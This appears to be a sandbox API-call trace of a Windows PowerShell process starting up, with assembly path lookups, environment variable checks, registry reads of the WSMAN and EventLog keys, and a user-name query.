	[0681.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0683.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0683.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0683.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0683.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0683.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0683.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0689.687] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0689.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0689.688] CoTaskMemFree (pv=0x139d70) 
	[0689.689] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0689.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0689.689] CoTaskMemFree (pv=0x139d70) 
	[0689.691] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0689.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0689.691] CoTaskMemFree (pv=0x139d70) 
	[0689.692] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0689.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0689.692] CoTaskMemFree (pv=0x139d70) 
	[0691.650] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0691.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.651] CoTaskMemFree (pv=0x139d70) 
	[0691.657] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0691.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.657] CoTaskMemFree (pv=0x139d70) 
	[0691.658] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0691.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.658] CoTaskMemFree (pv=0x139d70) 
	[0691.672] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d198 | out: phkResult=0x26d198*=0x308) returned 0x0
	[0691.675] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d09c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d098, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d09c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d098*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0691.675] CoTaskMemFree (pv=0x0) 
	[0691.678] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0691.678] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0xf4470, lpcchValueName=0x26d148, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d148, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0691.679] CoTaskMemFree (pv=0xf4470) 
	[0691.679] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0691.679] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0xf4470, lpcchValueName=0x26d148, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d148, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0691.679] CoTaskMemFree (pv=0xf4470) 
	[0691.679] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0691.679] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0xf4470, lpcchValueName=0x26d148, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d148, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0691.679] CoTaskMemFree (pv=0xf4470) 
	[0691.679] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d12c, lpData=0x0, lpcbData=0x26d128*=0x0 | out: lpType=0x26d12c*=0x1, lpData=0x0, lpcbData=0x26d128*=0x8) returned 0x0
	[0691.679] CoTaskMemAlloc (cb=0xc) returned 0x163270
	[0691.680] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d0fc, lpData=0x163270, lpcbData=0x26d0f8*=0x8 | out: lpType=0x26d0fc*=0x1, lpData="2.0", lpcbData=0x26d0f8*=0x8) returned 0x0
	[0691.680] CoTaskMemFree (pv=0x163270) 
	[0693.473] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x310) returned 0x0
	[0693.473] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26cfec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26cfe8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26cfec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26cfe8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0693.473] CoTaskMemFree (pv=0x0) 
	[0693.473] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0693.473] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0xf4470, lpcchValueName=0x26d098, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d098, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0693.474] CoTaskMemFree (pv=0xf4470) 
	[0693.474] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0693.474] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0xf4470, lpcchValueName=0x26d098, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d098, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0693.474] CoTaskMemFree (pv=0xf4470) 
	[0693.474] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0693.474] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0xf4470, lpcchValueName=0x26d098, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d098, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0693.474] CoTaskMemFree (pv=0xf4470) 
	[0693.474] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d07c, lpData=0x0, lpcbData=0x26d078*=0x0 | out: lpType=0x26d07c*=0x1, lpData=0x0, lpcbData=0x26d078*=0x8) returned 0x0
	[0693.474] CoTaskMemAlloc (cb=0xc) returned 0x1632d0
	[0693.474] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d04c, lpData=0x1632d0, lpcbData=0x26d048*=0x8 | out: lpType=0x26d04c*=0x1, lpData="2.0", lpcbData=0x26d048*=0x8) returned 0x0
	[0693.474] CoTaskMemFree (pv=0x1632d0) 
	[0693.476] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0693.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.476] CoTaskMemFree (pv=0x139d70) 
	[0699.855] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0699.856] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0699.856] CoTaskMemFree (pv=0x139d70) 
	[0699.862] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d118 | out: phkResult=0x26d118*=0x308) returned 0x0
	[0699.866] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d08c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d088, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d08c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d088*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0699.866] CoTaskMemFree (pv=0x0) 
	[0699.867] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0699.867] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0xf4470, lpcchName=0x26d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0699.868] CoTaskMemFree (pv=0xf4470) 
	[0699.868] CoTaskMemFree (pv=0x0) 
	[0699.868] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0699.868] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0xf4470, lpcchName=0x26d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0699.868] CoTaskMemFree (pv=0xf4470) 
	[0699.868] CoTaskMemFree (pv=0x0) 
	[0699.868] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0699.868] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0xf4470, lpcchName=0x26d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0699.868] CoTaskMemFree (pv=0xf4470) 
	[0699.868] CoTaskMemFree (pv=0x0) 
	[0699.868] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0699.868] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0xf4470, lpcchName=0x26d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0699.868] CoTaskMemFree (pv=0xf4470) 
	[0699.868] CoTaskMemFree (pv=0x0) 
	[0699.868] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0699.868] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0xf4470, lpcchName=0x26d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0699.868] CoTaskMemFree (pv=0xf4470) 
	[0699.868] CoTaskMemFree (pv=0x0) 
	[0699.869] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0699.869] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0xf4470, lpcchName=0x26d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0699.869] CoTaskMemFree (pv=0xf4470) 
	[0699.869] CoTaskMemFree (pv=0x0) 
	[0699.869] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0699.869] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0xf4470, lpcchName=0x26d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0699.869] CoTaskMemFree (pv=0xf4470) 
	[0699.869] CoTaskMemFree (pv=0x0) 
	[0699.869] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0699.869] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0xf4470, lpcchName=0x26d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0699.869] CoTaskMemFree (pv=0xf4470) 
	[0699.869] CoTaskMemFree (pv=0x0) 
	[0699.869] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0699.869] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0xf4470, lpcchName=0x26d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0699.869] CoTaskMemFree (pv=0xf4470) 
	[0699.869] CoTaskMemFree (pv=0x0) 
	[0699.869] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x310) returned 0x0
	[0699.870] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x0) returned 0x2
	[0699.870] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x328) returned 0x0
	[0699.870] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x0) returned 0x2
	[0699.870] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x2e0) returned 0x0
	[0699.870] RegOpenKeyExW (in: hKey=0x2e0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x0) returned 0x2
	[0699.870] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x2e4) returned 0x0
	[0699.870] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x0) returned 0x2
	[0699.870] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x334) returned 0x0
	[0699.870] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x0) returned 0x2
	[0699.871] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x338) returned 0x0
	[0699.871] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x0) returned 0x2
	[0699.871] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x33c) returned 0x0
	[0699.871] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x0) returned 0x2
	[0699.871] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x340) returned 0x0
	[0699.871] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x0) returned 0x2
	[0699.871] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x344) returned 0x0
	[0699.871] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d178 | out: phkResult=0x26d178*=0x348) returned 0x0
	[0699.872] RegCloseKey (hKey=0x348) returned 0x0
	[0699.872] RegCloseKey (hKey=0x308) returned 0x0
	[0699.873] RegCloseKey (hKey=0x344) returned 0x0
	[0700.137] CoTaskMemAlloc (cb=0x804) returned 0x1b88ccb0
	[0700.137] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b88ccb0, nSize=0x26d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d388) returned 0x1
	[0702.445] CoTaskMemFree (pv=0x1b88ccb0) 
	[0702.446] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0702.446] GetUserNameW (in: lpBuffer=0xf4470, pcbBuffer=0x26d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d3c8) returned 1
	[0702.447] CoTaskMemFree (pv=0xf4470) 
	[0706.082] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0c8 | out: phkResult=0x26d0c8*=0x34c) returned 0x0
	[0706.082] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d03c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d038, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d03c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d038*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.083] CoTaskMemFree (pv=0x0) 
	[0706.083] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.083] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.083] CoTaskMemFree (pv=0xf4470) 
	[0706.083] CoTaskMemFree (pv=0x0) 
	[0706.083] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.083] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.083] CoTaskMemFree (pv=0xf4470) 
	[0706.083] CoTaskMemFree (pv=0x0) 
	[0706.083] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.083] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.083] CoTaskMemFree (pv=0xf4470) 
	[0706.083] CoTaskMemFree (pv=0x0) 
	[0706.083] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.083] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.083] CoTaskMemFree (pv=0xf4470) 
	[0706.083] CoTaskMemFree (pv=0x0) 
	[0706.084] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.084] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.084] CoTaskMemFree (pv=0xf4470) 
	[0706.084] CoTaskMemFree (pv=0x0) 
	[0706.084] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.084] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.084] CoTaskMemFree (pv=0xf4470) 
	[0706.084] CoTaskMemFree (pv=0x0) 
	[0706.084] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.084] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.084] CoTaskMemFree (pv=0xf4470) 
	[0706.084] CoTaskMemFree (pv=0x0) 
	[0706.084] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.084] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.084] CoTaskMemFree (pv=0xf4470) 
	[0706.084] CoTaskMemFree (pv=0x0) 
	[0706.084] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0706.084] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0xf4470, lpcchName=0x26d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0706.085] CoTaskMemFree (pv=0xf4470) 
	[0706.085] CoTaskMemFree (pv=0x0) 
	[0706.085] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x350) returned 0x0
	[0706.085] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.085] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x354) returned 0x0
	[0706.085] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.085] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x358) returned 0x0
	[0706.085] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.085] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x35c) returned 0x0
	[0706.086] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x0) returned 0x2
	[0706.086] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d128 | out: phkResult=0x26d128*=0x360) returned 0x0
